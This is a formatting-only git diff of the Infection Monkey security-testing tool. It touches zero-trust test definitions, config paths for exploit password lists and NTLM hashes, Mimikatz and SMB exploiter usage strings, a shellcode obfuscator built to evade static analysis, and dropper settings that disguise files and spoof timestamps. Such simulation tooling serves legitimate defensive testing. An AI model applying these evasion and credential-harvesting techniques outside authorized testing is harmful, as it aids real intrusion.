command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys()))
for command, result in command_result_pairs:
instance = command_instance_dict[command]
instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
instance_results[instance["instance_id"]] = inst_n_cmd_res_to_res(instance, result)
return instance_results
@ -91,7 +91,9 @@ class CmdRunner(object):
results = []
while (curr_time - init_time < timeout) and (len(commands) != 0):
for command in list(commands): # list(commands) clones the list. We do so because we remove items inside
for command in list(
commands
): # list(commands) clones the list. We do so because we remove items inside
CmdRunner._process_command(command, commands, results, True)
time.sleep(CmdRunner.WAIT_SLEEP_TIME)
@ -102,8 +104,11 @@ class CmdRunner(object):
for command, result in results:
if not result.is_success:
logger.error('The following command failed: `%s`. status code: %s',
str(command[1]), str(result.status_code))
logger.error(
"The following command failed: `%s`. status code: %s",
str(command[1]),
str(result.status_code),
)
return results
@ -148,11 +153,13 @@ class CmdRunner(object):
c_id = command.cmd_id
try:
command_info = c_runner.query_command(c_id)
if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS:
if (not should_process_only_finished) or c_runner.get_command_status(
command_info
) != CmdStatus.IN_PROGRESS:
commands.remove(command)
results.append((command, c_runner.get_command_result(command_info)))
except Exception:
logger.exception('Exception while querying command: `%s`', str(c_id))
logger.exception("Exception while querying command: `%s`", str(c_id))
if not should_process_only_finished:
commands.remove(command)
results.append((command, CmdResult(False)))

View File

@ -1,6 +1,6 @@
from enum import Enum
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"
class CmdStatus(Enum):

View File

@ -1 +1 @@
T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download'
T1216_PBA_FILE_DOWNLOAD_PATH = "/api/t1216-pba/download"

View File

@ -1 +1 @@
ES_SERVICE = 'elastic-search-9200'
ES_SERVICE = "elastic-search-9200"

View File

@ -1,10 +1,10 @@
class TelemCategoryEnum:
EXPLOIT = 'exploit'
POST_BREACH = 'post_breach'
SCAN = 'scan'
SCOUTSUITE = 'scoutsuite'
STATE = 'state'
SYSTEM_INFO = 'system_info'
TRACE = 'trace'
TUNNEL = 'tunnel'
ATTACK = 'attack'
EXPLOIT = "exploit"
POST_BREACH = "post_breach"
SCAN = "scan"
SCOUTSUITE = "scoutsuite"
STATE = "state"
SYSTEM_INFO = "system_info"
TRACE = "trace"
TUNNEL = "tunnel"
ATTACK = "attack"

View File

@ -13,7 +13,15 @@ DEVICES = "Devices"
NETWORKS = "Networks"
PEOPLE = "People"
DATA = "Data"
PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
PILLARS = (
DATA,
PEOPLE,
NETWORKS,
DEVICES,
WORKLOADS,
VISIBILITY_ANALYTICS,
AUTOMATION_ORCHESTRATION,
)
STATUS_UNEXECUTED = "Unexecuted"
STATUS_PASSED = "Passed"
@ -57,7 +65,7 @@ TESTS = (
TEST_SCOUTSUITE_SECURE_AUTHENTICATION,
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES,
TEST_SCOUTSUITE_LOGGING,
TEST_SCOUTSUITE_SERVICE_SECURITY
TEST_SCOUTSUITE_SERVICE_SECURITY,
)
PRINCIPLE_DATA_CONFIDENTIALITY = "data_transit"
@ -81,7 +89,7 @@ PRINCIPLES = {
"Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources."
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@ -95,11 +103,11 @@ TESTS_MAP = {
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
},
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
@ -109,7 +117,7 @@ TESTS_MAP = {
},
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
@ -117,66 +125,66 @@ TESTS_MAP = {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
"software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
"security concern. "
"security concern. ",
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
},
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
"software.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
},
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
"that indicate attempts to access them. "
"that indicate attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
"attempts to access them. "
"attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_POSTGRESQL: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
"indicate attempts to access them. "
"indicate attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_TUNNELING: {
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
@ -186,89 +194,89 @@ TESTS_MAP = {
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
},
TEST_COMMUNICATE_AS_NEW_USER: {
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules."
STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
},
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data."
STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss."
STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
},
PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
STATUS_PASSED: "ScoutSuite found no issues related to users' authentication."
STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
},
PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found permissive user access policies.",
STATUS_PASSED: "ScoutSuite found no issues related to user access policies."
STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
},
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
PILLARS_KEY: [PEOPLE, WORKLOADS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_LOGGING: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found logging issues.",
STATUS_PASSED: "ScoutSuite found no logging issues."
STATUS_PASSED: "ScoutSuite found no logging issues.",
},
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SERVICE_SECURITY: {
TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "ScoutSuite found service security issues.",
STATUS_PASSED: "ScoutSuite found no service security issues."
STATUS_PASSED: "ScoutSuite found no service security issues.",
},
PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
PILLARS_KEY: [DEVICES, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
}
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
}
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
@ -282,7 +290,7 @@ PILLARS_TO_TESTS = {
DEVICES: [],
WORKLOADS: [],
VISIBILITY_ANALYTICS: [],
AUTOMATION_ORCHESTRATION: []
AUTOMATION_ORCHESTRATION: [],
}
PRINCIPLES_TO_TESTS = {}

View File

@ -1,13 +1,13 @@
AWS_KEYS_PATH = ['internal', 'monkey', 'aws_keys']
STARTED_ON_ISLAND_PATH = ['internal', 'general', 'started_on_island']
EXPORT_MONKEY_TELEMS_PATH = ['internal', 'testing', 'export_monkey_telems']
CURRENT_SERVER_PATH = ['internal', 'island_server', 'current_server']
SSH_KEYS_PATH = ['internal', 'exploits', 'exploit_ssh_keys']
INACCESSIBLE_SUBNETS_PATH = ['basic_network', 'network_analysis', 'inaccessible_subnets']
USER_LIST_PATH = ['basic', 'credentials', 'exploit_user_list']
PASSWORD_LIST_PATH = ['basic', 'credentials', 'exploit_password_list']
EXPLOITER_CLASSES_PATH = ['basic', 'exploiters', 'exploiter_classes']
SUBNET_SCAN_LIST_PATH = ['basic_network', 'scope', 'subnet_scan_list']
LOCAL_NETWORK_SCAN_PATH = ['basic_network', 'scope', 'local_network_scan']
LM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_lm_hash_list']
NTLM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_ntlm_hash_list']
AWS_KEYS_PATH = ["internal", "monkey", "aws_keys"]
STARTED_ON_ISLAND_PATH = ["internal", "general", "started_on_island"]
EXPORT_MONKEY_TELEMS_PATH = ["internal", "testing", "export_monkey_telems"]
CURRENT_SERVER_PATH = ["internal", "island_server", "current_server"]
SSH_KEYS_PATH = ["internal", "exploits", "exploit_ssh_keys"]
INACCESSIBLE_SUBNETS_PATH = ["basic_network", "network_analysis", "inaccessible_subnets"]
USER_LIST_PATH = ["basic", "credentials", "exploit_user_list"]
PASSWORD_LIST_PATH = ["basic", "credentials", "exploit_password_list"]
EXPLOITER_CLASSES_PATH = ["basic", "exploiters", "exploiter_classes"]
SUBNET_SCAN_LIST_PATH = ["basic_network", "scope", "subnet_scan_list"]
LOCAL_NETWORK_SCAN_PATH = ["basic_network", "scope", "local_network_scan"]
LM_HASH_LIST_PATH = ["internal", "exploits", "exploit_lm_hash_list"]
NTLM_HASH_LIST_PATH = ["internal", "exploits", "exploit_ntlm_hash_list"]

View File

@ -1 +1 @@
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"

View File

@ -5,7 +5,7 @@ import socket
import struct
from abc import ABCMeta, abstractmethod
__author__ = 'itamar'
__author__ = "itamar"
LOG = logging.getLogger(__name__)
@ -48,14 +48,14 @@ class NetworkRange(object, metaclass=ABCMeta):
address_str = address_str.strip()
if NetworkRange.check_if_range(address_str):
return IpRange(ip_range=address_str)
if -1 != address_str.find('/'):
if -1 != address_str.find("/"):
return CidrRange(cidr_range=address_str)
return SingleIpRange(ip_address=address_str)
@staticmethod
def check_if_range(address_str):
if -1 != address_str.find('-'):
ips = address_str.split('-')
if -1 != address_str.find("-"):
ips = address_str.split("-")
try:
ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
except ValueError:
@ -85,28 +85,36 @@ class CidrRange(NetworkRange):
return ipaddress.ip_address(ip_address) in self._ip_network
def _get_range(self):
return [CidrRange._ip_to_number(str(x)) for x in self._ip_network if x != self._ip_network.broadcast_address]
return [
CidrRange._ip_to_number(str(x))
for x in self._ip_network
if x != self._ip_network.broadcast_address
]
class IpRange(NetworkRange):
def __init__(self, ip_range=None, lower_end_ip=None, higher_end_ip=None, shuffle=True):
super(IpRange, self).__init__(shuffle=shuffle)
if ip_range is not None:
addresses = ip_range.split('-')
addresses = ip_range.split("-")
if len(addresses) != 2:
raise ValueError('Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20' % ip_range)
raise ValueError(
"Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range
)
self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses]
elif (lower_end_ip is not None) and (higher_end_ip is not None):
self._lower_end_ip = lower_end_ip.strip()
self._higher_end_ip = higher_end_ip.strip()
else:
raise ValueError('Illegal IP range: %s' % ip_range)
raise ValueError("Illegal IP range: %s" % ip_range)
self._lower_end_ip_num = self._ip_to_number(self._lower_end_ip)
self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip)
if self._higher_end_ip_num < self._lower_end_ip_num:
raise ValueError(
'Higher end IP %s is smaller than lower end IP %s' % (self._lower_end_ip, self._higher_end_ip))
"Higher end IP %s is smaller than lower end IP %s"
% (self._lower_end_ip, self._higher_end_ip)
)
def __repr__(self):
return "<IpRange %s-%s>" % (self._lower_end_ip, self._higher_end_ip)
@ -156,7 +164,7 @@ class SingleIpRange(NetworkRange):
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""
# The most common use case is to enter ip/range into "Scan IP/subnet list"
domain_name = ''
domain_name = ""
# Try casting user's input as IP
try:
@ -167,8 +175,10 @@ class SingleIpRange(NetworkRange):
ip = socket.gethostbyname(string_)
domain_name = string_
except socket.error:
LOG.error("Your specified host: {} is not found as a domain name and"
" it's not an IP address".format(string_))
LOG.error(
"Your specified host: {} is not found as a domain name and"
" it's not an IP address".format(string_)
)
return None, string_
# If a string_ was entered instead of IP we presume that it was domain name and translate it
return ip, domain_name

View File

@ -15,6 +15,6 @@ def get_host_from_network_location(network_location: str) -> str:
def remove_port(url):
parsed = urlparse(url)
with_port = f'{parsed.scheme}://{parsed.netloc}'
without_port = re.sub(':[0-9]+(?=$|/)', '', with_port)
with_port = f"{parsed.scheme}://{parsed.netloc}"
without_port = re.sub(":[0-9]+(?=$|/)", "", with_port)
return without_port

View File

@ -12,6 +12,6 @@ class TestNetworkUtils(TestCase):
assert get_host_from_network_location("user:password@host:8080") == "host"
def test_remove_port_from_url(self):
assert remove_port('https://google.com:80') == 'https://google.com'
assert remove_port('https://8.8.8.8:65336') == 'https://8.8.8.8'
assert remove_port('ftp://ftpserver.com:21/hello/world') == 'ftp://ftpserver.com'
assert remove_port("https://google.com:80") == "https://google.com"
assert remove_port("https://8.8.8.8:65336") == "https://8.8.8.8"
assert remove_port("ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com"

View File

@ -8,21 +8,13 @@ class TestSegmentationUtils:
target = CidrRange("2.2.2.0/24")
# IP not in both
assert get_ip_in_src_and_not_in_dst(
["3.3.3.3", "4.4.4.4"], source, target
) is None
assert get_ip_in_src_and_not_in_dst(["3.3.3.3", "4.4.4.4"], source, target) is None
# IP not in source, in target
assert (get_ip_in_src_and_not_in_dst(
["2.2.2.2"], source, target
)) is None
assert (get_ip_in_src_and_not_in_dst(["2.2.2.2"], source, target)) is None
# IP in source, not in target
assert (get_ip_in_src_and_not_in_dst(
["8.8.8.8", "1.1.1.1"], source, target
))
assert get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, target)
# IP in both subnets
assert (get_ip_in_src_and_not_in_dst(
["8.8.8.8", "1.1.1.1"], source, source
)) is None
assert (get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, source)) is None

View File

@ -13,17 +13,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."}
MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."}
MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."}
DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
SMB = {
ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
}
MIMIKATZ = {
ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
}
MIMIKATZ_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
}
DROPPER = {
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
" for monkey process wasn't successful."}
DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."}
" for monkey process wasn't successful.",
}
DROPPER_WINAPI = {
ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}
# Dict that describes what BITS job was used for
@ -31,8 +43,10 @@ BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system."
def format_time(time):
return "%s-%s %s:%s:%s" % (time.date().month,
return "%s-%s %s:%s:%s" % (
time.date().month,
time.date().day,
time.time().hour,
time.time().minute,
time.time().second)
time.time().second,
)

View File

@ -1,14 +1,13 @@
import sys
if sys.platform == 'win32':
if sys.platform == "win32":
import win32com
import wmi
__author__ = 'maor.rayzin'
__author__ = "maor.rayzin"
class MongoUtils:
def __init__(self):
# Static class
pass
@ -35,7 +34,10 @@ class MongoUtils:
try:
# objectSid property of ds_user is problematic and need this special treatment.
# ISWbemObjectEx interface. Class Uint8Array ?
if str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}":
if (
str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid)
== "{269AD56A-8A67-4129-BC8C-0506DCFE9880}"
):
return o.Value
except Exception:
pass

View File

@ -9,8 +9,8 @@ from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
# We only encrypt payloads to hide them from static analysis
# it's OK to have these keys plaintext
KEY = b'1234567890123456'
NONCE = b'\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f'
KEY = b"1234567890123456"
NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f"
# Use this manually to get obfuscated bytes of shellcode

View File

@ -2,12 +2,11 @@ from unittest import TestCase
from common.utils.shellcode_obfuscator import clarify, obfuscate
SHELLCODE = b'1234567890abcd'
OBFUSCATED_SHELLCODE = b'\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^='
SHELLCODE = b"1234567890abcd"
OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^="
class TestShellcodeObfuscator(TestCase):
def test_obfuscate(self):
assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE

View File

@ -8,11 +8,10 @@ if sys.platform.startswith("win"):
from .mongo_utils import MongoUtils
__author__ = 'maor.rayzin'
__author__ = "maor.rayzin"
class WMIUtils:
def __init__(self):
# Static class
pass

View File

@ -16,10 +16,12 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str)
parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
)
args = parser.parse_args()
print(get_version(args.build))
if __name__ == '__main__':
if __name__ == "__main__":
print_version()

View File

@ -1 +1 @@
__author__ = 'itay.mizeretz'
__author__ = "itay.mizeretz"

View File

@ -5,14 +5,19 @@ import uuid
from abc import ABCMeta
from itertools import product
__author__ = 'itamar'
__author__ = "itamar"
GUID = str(uuid.getnode())
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "monkey.bin")
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys", "aws_secret_access_key",
"aws_session_token"]
SENSITIVE_FIELDS = [
"exploit_password_list",
"exploit_user_list",
"exploit_ssh_keys",
"aws_secret_access_key",
"aws_session_token",
]
LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"]
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
@ -21,7 +26,7 @@ class Configuration(object):
def from_kv(self, formatted_data):
unknown_items = []
for key, value in list(formatted_data.items()):
if key.startswith('_'):
if key.startswith("_"):
continue
if key in LOCAL_CONFIG_VARS:
continue
@ -45,7 +50,7 @@ class Configuration(object):
def as_dict(self):
result = {}
for key in dir(Configuration):
if key.startswith('_'):
if key.startswith("_"):
continue
try:
value = getattr(self, key)
@ -75,10 +80,10 @@ class Configuration(object):
###########################
use_file_logging = True
dropper_log_path_windows = '%temp%\\~df1562.tmp'
dropper_log_path_linux = '/tmp/user-1562'
monkey_log_path_windows = '%temp%\\~df1563.tmp'
monkey_log_path_linux = '/tmp/user-1563'
dropper_log_path_windows = "%temp%\\~df1562.tmp"
dropper_log_path_linux = "/tmp/user-1562"
monkey_log_path_windows = "%temp%\\~df1563.tmp"
monkey_log_path_linux = "/tmp/user-1563"
send_log_to_server = True
###########################
@ -88,16 +93,16 @@ class Configuration(object):
dropper_try_move_first = True
dropper_set_date = True
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
dropper_date_reference_path_linux = '/bin/sh'
dropper_date_reference_path_linux = "/bin/sh"
dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe"
dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe"
dropper_target_path_linux = '/tmp/monkey'
dropper_target_path_linux = "/tmp/monkey"
###########################
# Kill file
###########################
